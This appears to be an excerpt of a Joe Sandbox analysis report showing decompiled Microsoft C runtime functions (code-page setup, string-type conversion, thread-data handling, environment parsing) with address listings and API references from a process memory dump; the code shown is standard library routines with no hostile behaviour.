    0x001440f3
    0x001440f3
    0x001440f5
    0x001440f7
    0x00000000
    0x00000000
    0x001440fd
    0x00144101
    0x001441b2
    0x001441b2
    0x001441b4
    0x00000000
    0x00000000
    0x001441ac
    0x001441b1
    0x001441b1
    0x001441b1
    0x001441b6
    0x001441b9
    0x001441bd
    0x00000000
    0x00000000
    0x00000000
    0x001441bd
    0x001440f3
    0x001441c3
    0x001441c3
    0x001441c6
    0x001441cb
    0x001441cb
    0x001441ce
    0x001441cf
    0x001441cf
    0x001441cf
    0x001441da
    0x001441dd
    0x001441dd
    0x001441f1
    0x001441f4
    0x001441f5
    0x001441f6
    0x001441a0
    0x001441a0
    0x001441a2
    0x00000000
    0x001441a2
    0x001440bc
    0x001440a9
    0x00144097
    0x0014408b
    0x00000000
    0x00144083
    0x00144113
    0x0014411e
    0x00144121
    0x00144124
    0x0014412a
    0x0014415a
    0x0014415a
    0x0014415a
    0x0014415d
    0x00000000
    0x00000000
    0x0014412f
    0x00144132
    0x00144134
    0x00144136
    0x00144139
    0x00144150
    0x00144150
    0x00144152
    0x00000000
    0x00000000
    0x00144141
    0x00144147
    0x0014414b
    0x0014414f
    0x0014414f
    0x0014414f
    0x00144154
    0x00144157
    0x00144157
    0x00000000
    0x00144157
    0x00000000
    0x00144134
    0x00144162
    0x00144165
    0x00144168
    0x0014416c
    0x0014416f
    0x00000000
    0x00000000
    0x00144173
    0x00144176
    0x0014417d
    0x00144184
    0x00144187
    0x0014418a
    0x00144190
    0x00144191
    0x00144194
    0x00144197
    0x0014419a
    0x0014419d
    0x0014419d
    0x0014419d
    0x00000000
    0x00144059
    0x00144059
    0x0014405b
    0x00144060
    0x00144060
    0x00144060
    0x00144208
    0x00144216

    APIs
      • Part of subcall function 00143FB2: GetOEMCP.KERNEL32(00000000,?), ref: 00143FDB
      • Part of subcall function 00143FB2: GetACP.KERNEL32(00000000,?), ref: 00143FFE
    • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000), ref: 001440A1
    • GetCPInfo.KERNEL32(00000000,?), ref: 001440B4
    • setSBUpLow.LIBCMT ref: 001441A2
      • Part of subcall function 00143D7B: GetCPInfo.KERNEL32(?,?,00000000,?), ref: 00143D9C
      • Part of subcall function 00143D7B: ___crtGetStringTypeA.LIBCMT ref: 00143E19
      • Part of subcall function 00143D7B: ___crtLCMapStringA.LIBCMT ref: 00143E39
      • Part of subcall function 00143D7B: ___crtLCMapStringA.LIBCMT ref: 00143E5E
    • setSBCS.LIBCMT ref: 0014405B
      • Part of subcall function 001417EA: IsDebuggerPresent.KERNEL32 ref: 00141A54
      • Part of subcall function 001417EA: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00141A69
      • Part of subcall function 001417EA: UnhandledExceptionFilter.KERNEL32(001461B8), ref: 00141A74
      • Part of subcall function 001417EA: GetCurrentProcess.KERNEL32(C0000409), ref: 00141A90
      • Part of subcall function 001417EA: TerminateProcess.KERNEL32(00000000), ref: 00141A97
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 00145083, Relevance: 6.1, APIs: 4, Instructions: 92
    C-Code - Quality: 79%
    			E00145083(void* __ecx, intOrPtr __edx, intOrPtr* _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t27;
				intOrPtr _t33;
				int _t37;
				void* _t40;
				short* _t41;
				short* _t47;
				intOrPtr _t48;
				intOrPtr _t54;
				int _t56;
				intOrPtr _t57;
				intOrPtr _t60;
				signed int _t61;
				short* _t62;

				_t54 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t27 =  *0x149004; // 0x20251455
				_v8 = _t27 ^ _t61;
				_t47 = 0;
				_v12 = 0;
				if(_a24 == 0) {
					_a24 =  *((intOrPtr*)( *_a4 + 4));
				}
				_t56 = MultiByteToWideChar(_a24, 1 + (0 | _a28 != _t47) * 8, _a12, _a16, _t47, _t47);
				if(_t56 != _t47) {
					if(__eflags > 0) {
						__eflags = _t56 - 0x7ffffff0;
						if(_t56 <= 0x7ffffff0) {
							_t16 = _t56 + 8; // 0x8
							_t40 = _t56 + _t16;
							__eflags = _t40 - 0x400;
							if(_t40 > 0x400) {
								_t41 = E001451AA(_t54, _t56, MultiByteToWideChar, _t40);
								__eflags = _t41 - _t47;
								if(_t41 != _t47) {
									 *_t41 = 0xdddd;
									goto L11;
								}
							} else {
								E00145AA0(_t40);
								_t41 = _t62;
								__eflags = _t41 - _t47;
								if(_t41 != _t47) {
									 *_t41 = 0xcccc;
									L11:
									_t41 =  &(_t41[4]);
									__eflags = _t41;
								}
							}
							_t47 = _t41;
						}
					}
					__eflags = _t47;
					if(_t47 == 0) {
						goto L3;
					} else {
						E00144DA0(_t47, 0, _t56 + _t56);
						_t37 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t47, _t56);
						__eflags = _t37;
						if(_t37 != 0) {
							_v12 = GetStringTypeW(_a8, _t47, _t37, _a20);
						}
						E00144D71(_t47);
						_t33 = _v12;
					}
				} else {
					L3:
					_t33 = 0;
				}
				_pop(_t57);
				_pop(_t60);
				_pop(_t48);
				return E001417EA(_t33, _t48, _v8 ^ _t61, _t54, _t57, _t60);
			}






















    0x00145083
    0x00145088
    0x00145089
    0x0014508a
    0x00145091
    0x00145095
    0x00145099
    0x0014509f
    0x001450a9
    0x001450a9
    0x001450cf
    0x001450d3
    0x001450d9
    0x001450db
    0x001450e1
    0x001450e3
    0x001450e3
    0x001450e7
    0x001450ec
    0x00145102
    0x00145108
    0x0014510a
    0x0014510c
    0x00000000
    0x0014510c
    0x001450ee
    0x001450ee
    0x001450f3
    0x001450f5
    0x001450f7
    0x001450f9
    0x00145112
    0x00145112
    0x00145112
    0x00145112
    0x001450f7
    0x00145115
    0x00145115
    0x001450e1
    0x00145117
    0x00145119
    0x00000000
    0x0014511b
    0x00145122
    0x00145137
    0x00145139
    0x0014513b
    0x0014514b
    0x0014514b
    0x0014514f
    0x00145154
    0x00145157
    0x001450d5
    0x001450d5
    0x001450d5
    0x001450d5
    0x0014515b
    0x0014515c
    0x0014515d
    0x00145169

    APIs
    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,?,?,?,?,00145198,?,?,?), ref: 001450CD
      • Part of subcall function 001451AA: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00144479,?,00000001,?,?,00143061,00000018,00147C50,0000000C,001430F1), ref: 001451EF
    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000), ref: 00145137
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00145145
    • __freea.LIBCMT ref: 0014514F
      • Part of subcall function 001417EA: IsDebuggerPresent.KERNEL32 ref: 00141A54
      • Part of subcall function 001417EA: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00141A69
      • Part of subcall function 001417EA: UnhandledExceptionFilter.KERNEL32(001461B8), ref: 00141A74
      • Part of subcall function 001417EA: GetCurrentProcess.KERNEL32(C0000409), ref: 00141A90
      • Part of subcall function 001417EA: TerminateProcess.KERNEL32(00000000), ref: 00141A97
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 00142830, Relevance: 6.0, APIs: 4, Instructions: 50
    C-Code - Quality: 58%
    			E00142830() {
				signed int _t3;
				long _t4;
				struct _CRITICAL_SECTION* _t5;
				struct _CRITICAL_SECTION* _t14;
				signed int* _t17;
				struct _CRITICAL_SECTION** _t18;

				_t3 =  *0x149050; // 0x3
				if(_t3 != 0xffffffff) {
					__imp__DecodePointer( *0x14a5c4, _t3);
					 *_t3();
					 *0x149050 =  *0x149050 | 0xffffffff;
				}
				_t4 =  *0x149054; // 0x7
				if(_t4 != 0xffffffff) {
					TlsFree(_t4);
					 *0x149054 =  *0x149054 | 0xffffffff;
				}
				_t17 = 0x149060;
				do {
					_t14 =  *_t17;
					if(_t14 != 0 && _t17[1] != 1) {
						DeleteCriticalSection(_t14);
						E001443CF(_t14);
						 *_t17 =  *_t17 & 0x00000000;
					}
					_t17 =  &(_t17[2]);
				} while (_t17 < 0x149180);
				_t18 = 0x149060;
				do {
					_t5 =  *_t18;
					if(_t5 != 0 && _t18[1] == 1) {
						DeleteCriticalSection(_t5);
					}
					_t18 =  &(_t18[2]);
				} while (_t18 < 0x149180);
				return _t5;
			}









    0x00142830
    0x00142838
    0x00142841
    0x00142847
    0x00142849
    0x00142849
    0x00142850
    0x00142858
    0x0014285b
    0x00142861
    0x00142861
    0x00142fb0
    0x00142fb6
    0x00142fb6
    0x00142fba
    0x00142fc3
    0x00142fc6
    0x00142fcb
    0x00142fce
    0x00142fcf
    0x00142fd2
    0x00142fda
    0x00142fe0
    0x00142fe0
    0x00142fe4
    0x00142fed
    0x00142fed
    0x00142fef
    0x00142ff2
    0x00142ffc

    APIs
    • DecodePointer.KERNEL32(00000003,00142C59,?,001418AC), ref: 00142841
    • TlsFree.KERNEL32(00000007,00142C59,?,001418AC), ref: 0014285B
    • DeleteCriticalSection.KERNEL32(00000000,00000000,774FA0FD,?,00142C59,?,001418AC), ref: 00142FC3
      • Part of subcall function 001443CF: HeapFree.KERNEL32(00000000,00000000), ref: 001443E5
      • Part of subcall function 001443CF: GetLastError.KERNEL32(00000000,?,0014298B,00000000,?,00141E3B,00000003), ref: 001443F7
    • DeleteCriticalSection.KERNEL32(00000007,774FA0FD,?,00142C59,?,001418AC), ref: 00142FED
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 00143F0B, Relevance: 6.0, APIs: 4, Instructions: 47
    C-Code - Quality: 80%
    			E00143F0B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x147cd0);
				E00142C80(__ebx, __edi, __esi);
				_t31 = E0014299A(__ebx, _t35);
				_t15 =  *0x149aa0; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E001430D6(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x149748; // 0x12c16b0
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x149320;
								if(__eflags != 0) {
									E001443CF(_t33);
								}
							}
						}
						_t21 =  *0x149748; // 0x12c16b0
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x149748; // 0x12c16b0
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00143FA6();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					_push(0x20);
					E00141DBC(_t29, _t38);
				}
				return E00142CC5(_t33);
			}










    0x00143f0b
    0x00143f0b
    0x00143f0b
    0x00143f0b
    0x00143f0d
    0x00143f12
    0x00143f1c
    0x00143f1e
    0x00143f26
    0x00143f47
    0x00143f4d
    0x00143f51
    0x00143f54
    0x00143f57
    0x00143f5d
    0x00143f5f
    0x00143f61
    0x00143f6a
    0x00143f6c
    0x00143f6e
    0x00143f74
    0x00143f77
    0x00143f7c
    0x00143f74
    0x00143f6c
    0x00143f7d
    0x00143f82
    0x00143f85
    0x00143f8b
    0x00143f8f
    0x00143f8f
    0x00143f95
    0x00143f9c
    0x00143f2e
    0x00143f2e
    0x00143f2e
    0x00143f31
    0x00143f33
    0x00143f35
    0x00143f37
    0x00143f3c
    0x00143f44

    APIs
    • __getptd.LIBCMT ref: 00143F17
      • Part of subcall function 0014299A: __amsg_exit.LIBCMT ref: 001429AA
    • __amsg_exit.LIBCMT ref: 00143F37
      • Part of subcall function 001430D6: __amsg_exit.LIBCMT ref: 001430F8
      • Part of subcall function 001430D6: EnterCriticalSection.KERNEL32(?,?,?,001428B7,0000000D,?,00141E3B,00000003), ref: 00143100
    • InterlockedDecrement.KERNEL32(?), ref: 00143F64
      • Part of subcall function 001443CF: HeapFree.KERNEL32(00000000,00000000), ref: 001443E5
      • Part of subcall function 001443CF: GetLastError.KERNEL32(00000000,?,0014298B,00000000,?,00141E3B,00000003), ref: 001443F7
    • InterlockedIncrement.KERNEL32(012C16B0), ref: 00143F8F
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 00142921, Relevance: 6.0, APIs: 4, Instructions: 45thread
    C-Code - Quality: 59%
    			E00142921(void* __ebx, void* __edx) {
				void* __edi;
				void* __esi;
				long _t3;
				long* _t7;
				void* _t8;
				long _t11;
				void* _t18;
				long _t19;
				long* _t20;

				_t18 = __edx;
				_t3 = GetLastError();
				_push( *0x149050);
				_t19 = _t3;
				_t20 =  *((intOrPtr*)(E001427FC()))();
				if(_t20 == 0) {
					_t7 = E001444AD(1, 0x214);
					_t20 = _t7;
					if(_t20 != 0) {
						__imp__DecodePointer( *0x14a5c0,  *0x149050, _t20);
						_t8 =  *_t7();
						_t23 = _t8;
						if(_t8 == 0) {
							E001443CF(_t20);
							_t20 = 0;
							__eflags = 0;
						} else {
							_push(0);
							_push(_t20);
							E0014286D(__ebx, _t18, _t19, _t20, _t23);
							_t11 = GetCurrentThreadId();
							_t20[1] = _t20[1] | 0xffffffff;
							 *_t20 = _t11;
						}
					}
				}
				SetLastError(_t19);
				return _t20;
			}












    0x00142921
    0x00142925
    0x0014292b
    0x00142931
    0x0014293a
    0x0014293e
    0x00142947
    0x0014294c
    0x00142952
    0x00142961
    0x00142967
    0x00142969
    0x0014296b
    0x00142986
    0x0014298c
    0x0014298c
    0x0014296d
    0x0014296d
    0x0014296f
    0x00142970
    0x00142977
    0x0014297d
    0x00142981
    0x00142981
    0x0014296b
    0x00142952
    0x0014298f
    0x00142999

    APIs
    • GetLastError.KERNEL32(00000000,?,00143544,00143BE6,?,00141E3B,00000003), ref: 00142925
      • Part of subcall function 001427FC: TlsGetValue.KERNEL32(?,00142938,?,00141E3B,00000003), ref: 00142805
      • Part of subcall function 001427FC: DecodePointer.KERNEL32(?,00141E3B,00000003), ref: 00142817
      • Part of subcall function 001427FC: TlsSetValue.KERNEL32(00000000,?,00141E3B,00000003), ref: 00142826
    • SetLastError.KERNEL32(00000000,?,00141E3B,00000003), ref: 0014298F
      • Part of subcall function 001444AD: Sleep.KERNEL32(00000000), ref: 001444D5
    • DecodePointer.KERNEL32(00000000,?,00141E3B,00000003), ref: 00142961
    • GetCurrentThreadId.KERNEL32(?,00141E3B,00000003), ref: 00142977
      • Part of subcall function 001443CF: HeapFree.KERNEL32(00000000,00000000), ref: 001443E5
      • Part of subcall function 001443CF: GetLastError.KERNEL32(00000000,?,0014298B,00000000,?,00141E3B,00000003), ref: 001443F7
      • Part of subcall function 0014286D: GetModuleHandleW.KERNEL32(KERNEL32.DLL,00147BE0,00000008,00142975,00000000,00000000,?,00141E3B,00000003), ref: 0014287E
      • Part of subcall function 0014286D: InterlockedIncrement.KERNEL32(00149320), ref: 001428BF
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 00142191, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 129
    C-Code - Quality: 75%
    			E00142191(void* __ecx, intOrPtr* __edx, void* __edi, signed int* _a4, signed int _a8, intOrPtr* _a12) {
				signed int _v8;
				intOrPtr* _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _t50;
				void* _t51;
				signed int _t53;
				void* _t56;
				signed int _t57;
				void* _t58;
				signed int* _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr* _t69;
				void* _t81;
				signed char _t83;
				void* _t86;
				intOrPtr* _t96;
				unsigned int _t98;
				intOrPtr* _t104;
				signed int _t105;
				void* _t107;
				signed int _t108;
				signed int _t110;
				signed int _t113;
				signed int _t115;
				intOrPtr* _t116;
				void* _t121;

				_t107 = __edi;
				_t104 = __edx;
				if( *0x14a8ac == 0) {
					_t50 = E001443B1(__ecx);
				}
				_t113 =  *0x149b20; // 0x0
				_push(_t107);
				_t108 = 0;
				if(_t113 != 0) {
					while(1) {
						_t51 =  *_t113;
						if(_t51 == 0) {
							break;
						}
						if(_t51 != 0x3d) {
							_t108 = _t108 + 1;
						}
						_t113 = _t113 + E00143800(_t113) + 1;
					}
					_t50 = E001444AD(_t108 + 1, 4);
					_t110 = _t50;
					 *0x149e64 = _t110;
					if(_t110 == 0) {
						goto L3;
					} else {
						_t115 =  *0x149b20; // 0x0
						while( *_t115 != 0) {
							_t3 = E00143800(_t115) + 1; // 0x1
							_t81 = _t3;
							if( *_t115 == 0x3d) {
								L14:
								_t115 = _t115 + _t81;
								continue;
							} else {
								_t56 = E001444AD(_t81, 1);
								_pop(_t95);
								 *_t110 = _t56;
								if(_t56 == 0) {
									_t57 = E001443CF( *0x149e64);
									 *0x149e64 =  *0x149e64 & 0x00000000;
									_t53 = _t57 | 0xffffffff;
									L17:
									goto L18;
								} else {
									_t58 = E00144409(_t56, _t81, _t115);
									_t121 = _t121 + 0xc;
									if(_t58 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E00143464();
										asm("int3");
										_t96 = _v20;
										_push(_t81);
										_push(_t115);
										 *_t110 = 0;
										_t116 = _t104;
										_t105 = _v24;
										 *_t96 = 1;
										if(_v28 != 0) {
											_a4 =  &(_a4[1]);
											 *_a4 = _t105;
										}
										_v8 = 0;
										do {
											if( *_t116 != 0x22) {
												 *_t110 =  *_t110 + 1;
												if(_t105 != 0) {
													 *_t105 =  *_t116;
													_a8 = _t105 + 1;
												}
												_t83 =  *_t116;
												_t116 = _t116 + 1;
												if(E00143CD0(_t83 & 0x000000ff) != 0) {
													 *_t110 =  *_t110 + 1;
													if(_a8 != 0) {
														_a8 = _a8 + 1;
														 *_a8 =  *_t116;
													}
													_t116 = _t116 + 1;
												}
												_t105 = _a8;
												_t96 = _a12;
												if(_t83 == 0) {
													_t116 = _t116 - 1;
												} else {
													goto L33;
												}
											} else {
												_t83 = 0x22;
												_t116 = _t116 + 1;
												_v8 = 0 | _v8 == 0x00000000;
												goto L33;
											}
											L38:
											_v8 = _v8 & 0x00000000;
											L39:
											while( *_t116 != 0) {
												while(1) {
													_t65 =  *_t116;
													if(_t65 != 0x20 && _t65 != 9) {
														break;
													}
													_t116 = _t116 + 1;
												}
												if( *_t116 != 0) {
													if(_a4 != 0) {
														_a4 =  &(_a4[1]);
														 *_a4 = _t105;
													}
													 *_t96 =  *_t96 + 1;
													while(1) {
														_t86 = 1;
														_t98 = 0;
														L50:
														while( *_t116 == 0x5c) {
															_t116 = _t116 + 1;
															_t98 = _t98 + 1;
														}
														if( *_t116 == 0x22) {
															if((_t98 & 0x00000001) == 0) {
																if(_v8 == 0) {
																	L56:
																	_t86 = 0;
																	_v8 = 0 | _v8 == 0x00000000;
																} else {
																	_t69 = _t116 + 1;
																	if( *_t69 != 0x22) {
																		goto L56;
																	} else {
																		_t116 = _t69;
																	}
																}
															}
															_t98 = _t98 >> 1;
														}
														if(_t98 != 0) {
															do {
																_t98 = _t98 - 1;
																if(_t105 != 0) {
																	 *_t105 = 0x5c;
																	_t105 = _t105 + 1;
																}
																 *_t110 =  *_t110 + 1;
															} while (_t98 != 0);
															_a8 = _t105;
														}
														_t66 =  *_t116;
														if(_t66 != 0 && (_v8 != 0 || _t66 != 0x20 && _t66 != 9)) {
															if(_t86 != 0) {
																_push(_t66);
																if(_t105 == 0) {
																	if(E00143CD0() != 0) {
																		_t116 = _t116 + 1;
																		 *_t110 =  *_t110 + 1;
																	}
																} else {
																	if(E00143CD0() != 0) {
																		_a8 = _a8 + 1;
																		 *_a8 =  *_t116;
																		_t116 = _t116 + 1;
																		 *_t110 =  *_t110 + 1;
																	}
																	_a8 = _a8 + 1;
																	 *_a8 =  *_t116;
																}
																 *_t110 =  *_t110 + 1;
																_t105 = _a8;
															}
															_t116 = _t116 + 1;
															_t86 = 1;
															_t98 = 0;
															goto L50;
														}
														if(_t105 != 0) {
															 *_t105 = 0;
															_t105 = _t105 + 1;
															_a8 = _t105;
														}
														 *_t110 =  *_t110 + 1;
														_t96 = _a12;
														goto L39;
													}
												}
												break;
											}
											_t64 = _a4;
											if(_t64 != 0) {
												 *_t64 =  *_t64 & 0x00000000;
											}
											 *_t96 =  *_t96 + 1;
											return _t64;
											goto L82;
											L33:
										} while (_v8 != 0 || _t83 != 0x20 && _t83 != 9);
										if(_t105 != 0) {
											 *((char*)(_t105 - 1)) = 0;
										}
										goto L38;
									} else {
										_t110 = _t110 + 4;
										goto L14;
									}
								}
							}
							goto L82;
						}
						E001443CF( *0x149b20);
						 *0x149b20 =  *0x149b20 & 0x00000000;
						 *_t110 =  *_t110 & 0x00000000;
						 *0x14a8a0 = 1;
						_t53 = 0;
						goto L17;
					}
				} else {
					L3:
					_t53 = _t50 | 0xffffffff;
					L18:
					return _t53;
				}
				L82:
			}































    0x00142191
    0x00142191
    0x00142198
    0x0014219a
    0x0014219a
    0x001421a0
    0x001421a6
    0x001421a7
    0x001421ab
    0x001421c5
    0x001421c5
    0x001421c9
    0x00000000
    0x00000000
    0x001421b7
    0x001421b9
    0x001421b9
    0x001421c1
    0x001421c1
    0x001421cf
    0x001421d4
    0x001421d8
    0x001421e0
    0x00000000
    0x001421e2
    0x001421e2
    0x0014221e
    0x001421f5
    0x001421f5
    0x001421f8
    0x0014221c
    0x0014221c
    0x00000000
    0x001421fa
    0x001421fd
    0x00142203
    0x00142204
    0x00142208
    0x0014224f
    0x00142254
    0x0014225b
    0x00142244
    0x00000000
    0x0014220a
    0x0014220d
    0x00142212
    0x00142217
    0x00142262
    0x00142263
    0x00142264
    0x00142265
    0x00142266
    0x00142267
    0x0014226c
    0x00142273
    0x00142276
    0x00142279
    0x0014227a
    0x0014227c
    0x0014227e
    0x00142281
    0x0014228a
    0x0014228f
    0x00142293
    0x00142293
    0x00142295
    0x00142298
    0x0014229b
    0x001422ad
    0x001422b1
    0x001422b5
    0x001422b8
    0x001422b8
    0x001422bb
    0x001422c1
    0x001422ca
    0x001422cc
    0x001422d2
    0x001422d9
    0x001422dc
    0x001422dc
    0x001422de
    0x001422de
    0x001422df
    0x001422e2
    0x001422e7
    0x0014231b
    0x00000000
    0x00000000
    0x00000000
    0x0014229d
    0x001422a2
    0x001422a7
    0x001422a8
    0x00000000
    0x001422a8
    0x00142301
    0x00142301
    0x00000000
    0x00142305
    0x0014230e
    0x0014230e
    0x00142312
    0x00000000
    0x00000000
    0x00142318
    0x00142318
    0x00142321
    0x0014232b
    0x00142330
    0x00142334
    0x00142334
    0x00142336
    0x00142338
    0x0014233a
    0x0014233b
    0x00000000
    0x00142341
    0x0014233f
    0x00142340
    0x00142340
    0x00142349
    0x0014234e
    0x00142354
    0x00142362
    0x00142364
    0x0014236c
    0x00142356
    0x00142356
    0x0014235c
    0x00000000
    0x0014235e
    0x0014235e
    0x0014235e
    0x0014235c
    0x00142354
    0x0014236f
    0x0014236f
    0x00142373
    0x00142375
    0x00142375
    0x00142378
    0x0014237a
    0x0014237d
    0x0014237d
    0x0014237e
    0x00142380
    0x00142384
    0x00142384
    0x00142387
    0x0014238b
    0x0014239d
    0x001423a2
    0x001423a5
    0x001423d2
    0x001423d4
    0x001423d5
    0x001423d5
    0x001423a7
    0x001423af
    0x001423b6
    0x001423b9
    0x001423bb
    0x001423bc
    0x001423bc
    0x001423c3
    0x001423c6
    0x001423c6
    0x001423d7
    0x001423d9
    0x001423d9
    0x001423dc
    0x0014233a
    0x0014233b
    0x00000000
    0x0014233d
    0x001423e4
    0x001423e6
    0x001423e9
    0x001423ea
    0x001423ea
    0x001423ed
    0x001423ef
    0x00000000
    0x001423ef
    0x00142338
    0x00000000
    0x00142321
    0x001423f7
    0x001423fe
    0x00142400
    0x00142400
    0x00142403
    0x00142406
    0x00000000
    0x001422e9
    0x001422e9
    0x001422fb
    0x001422fd
    0x001422fd
    0x00000000
    0x00142219
    0x00142219
    0x00000000
    0x00142219
    0x00142217
    0x00142208
    0x00000000
    0x001421f8
    0x00142229
    0x0014222e
    0x00142235
    0x00142238
    0x00142242
    0x00000000
    0x00142242
    0x001421ad
    0x001421ad
    0x001421ad
    0x00142246
    0x00142248
    0x00142248
    0x00000000

    APIs
    • _strlen.LIBCMT ref: 001421BB
      • Part of subcall function 001444AD: Sleep.KERNEL32(00000000), ref: 001444D5
    • _strlen.LIBCMT ref: 001421EC
      • Part of subcall function 001443CF: HeapFree.KERNEL32(00000000,00000000), ref: 001443E5
      • Part of subcall function 001443CF: GetLastError.KERNEL32(00000000,?,0014298B,00000000,?,00141E3B,00000003), ref: 001443F7
      • Part of subcall function 00143464: GetCurrentProcess.KERNEL32(C0000417), ref: 0014347A
      • Part of subcall function 00143464: TerminateProcess.KERNEL32(00000000), ref: 00143481
      • Part of subcall function 00143CD0: x_ismbbtype_l.LIBCMT ref: 00143CDE
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 0014286D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40
    C-Code - Quality: 91%
    			E0014286D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t26;
				intOrPtr _t30;
				intOrPtr _t40;
				void* _t41;

				_t31 = __ebx;
				_push(8);
				_push(0x147be0);
				E00142C80(__ebx, __edi, __esi);
				GetModuleHandleW(L"KERNEL32.DLL");
				_t40 =  *((intOrPtr*)(_t41 + 8));
				 *((intOrPtr*)(_t40 + 0x5c)) = 0x146bd8;
				 *(_t40 + 8) =  *(_t40 + 8) & 0x00000000;
				 *((intOrPtr*)(_t40 + 0x14)) = 1;
				 *((intOrPtr*)(_t40 + 0x70)) = 1;
				 *((char*)(_t40 + 0xc8)) = 0x43;
				 *((char*)(_t40 + 0x14b)) = 0x43;
				 *(_t40 + 0x68) = 0x149320;
				E001430D6(__ebx, 1, 0xd);
				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
				InterlockedIncrement( *(_t40 + 0x68));
				 *(_t41 - 4) = 0xfffffffe;
				E0014290F();
				E001430D6(_t31, 1, 0xc);
				 *(_t41 - 4) = 1;
				_t26 =  *((intOrPtr*)(_t41 + 0xc));
				 *((intOrPtr*)(_t40 + 0x6c)) = _t26;
				if(_t26 == 0) {
					_t30 =  *0x149a88; // 0x1499b0
					 *((intOrPtr*)(_t40 + 0x6c)) = _t30;
				}
				E00144547( *((intOrPtr*)(_t40 + 0x6c)));
				 *(_t41 - 4) = 0xfffffffe;
				return E00142CC5(E00142918());
			}







    0x0014286d
    0x0014286d
    0x0014286f
    0x00142874
    0x0014287e
    0x00142884
    0x00142887
    0x0014288e
    0x00142895
    0x00142898
    0x0014289b
    0x001428a2
    0x001428a9
    0x001428b2
    0x001428b8
    0x001428bf
    0x001428c5
    0x001428cc
    0x001428d3
    0x001428d9
    0x001428dc
    0x001428df
    0x001428e4
    0x001428e6
